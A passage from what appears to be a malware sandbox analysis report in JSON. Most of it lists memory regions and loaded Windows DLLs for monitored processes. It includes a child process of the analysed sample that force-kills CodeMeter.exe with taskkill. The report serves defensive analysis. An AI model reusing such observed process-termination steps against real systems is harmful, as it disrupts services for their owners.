"pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2244", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:21.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_2245", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:21.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 999423, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2246", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:21.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_2247", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:21.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_2248", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:21.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_2249", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:21.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_2250", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:21.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_2251", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:21.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 3932160, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2252", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3932160, "timestamp": "00:01:21.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7143423, "entry_point": 0, "filename": null, "id": "region_2253", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:01:21.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9371648, "type": "region", "version": 1 }, "end_va": 10948607, "entry_point": 0, "filename": null, "id": "region_2254", "name": "pagefile_0x00000000008f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9371648, "timestamp": "00:01:21.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12386304, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_2255", "name": "pagefile_0x0000000000bd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12386304, "timestamp": "00:01:21.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2256", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:21.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2257", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:21.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_2258", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:21.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2259", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:21.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2260", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:21.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 5111807, "entry_point": 0, "filename": null, "id": "region_2261", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:01:21.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 12058623, "entry_point": 0, "filename": null, "id": "region_2262", "name": "private_0x0000000000a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 11010048, "timestamp": "00:01:21.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2263", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:21.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6422527, "entry_point": 0, "filename": null, "id": "region_2264", "name": "private_0x00000000005e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6160384, "timestamp": "00:01:21.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6684671, "entry_point": 0, "filename": null, "id": "region_2265", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:01:21.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 36302847, "entry_point": 33357824, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2266", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:01:21.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2267", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:21.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2268", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:21.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2269", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:21.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2270", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:21.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7405567, "entry_point": 0, "filename": null, "id": "region_2271", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:21.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7405568, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_2272", "name": "private_0x0000000000710000", "norm_filename": null, "region_type": "private_memory", "start_va": 7405568, "timestamp": "00:01:21.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 36634623, "entry_point": 0, "filename": null, "id": "region_2273", "name": "private_0x00000000022b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36372480, "timestamp": "00:01:21.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37158912, "type": "region", "version": 1 }, "end_va": 37421055, "entry_point": 0, "filename": null, "id": "region_2274", "name": "private_0x0000000002370000", "norm_filename": null, "region_type": "private_memory", "start_va": 37158912, "timestamp": "00:01:21.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2275", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:21.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2276", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:21.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2277", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:21.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1785921536, "type": "region", "version": 1 }, "end_va": 1786019839, "entry_point": 1785926453, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2278", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1785921536, "timestamp": "00:01:21.247", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1786052608, "type": "region", "version": 1 }, "end_va": 1786667007, "entry_point": 1786181817, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2279", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1786052608, "timestamp": "00:01:21.248", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM CodeMeter.exe /IM CodeMeter.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_15", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 15, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2280", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:21.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2281", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:21.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2282", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:21.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2283", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:21.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2284", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:21.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_2285", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:21.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_2286", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:01:21.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 6709247, "entry_point": 6642825, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2287", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 6619136, "timestamp": "00:01:21.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2288", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:21.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2289", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:21.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2290", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:21.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2291", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:21.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2292", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:21.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2293", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:21.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2294", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:21.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2295", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:21.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2296", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:21.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_2297", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:21.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2298", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:21.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2299", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:21.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2300", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:21.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2301", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:21.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2302", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:21.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2303", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:21.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2304", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:21.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": 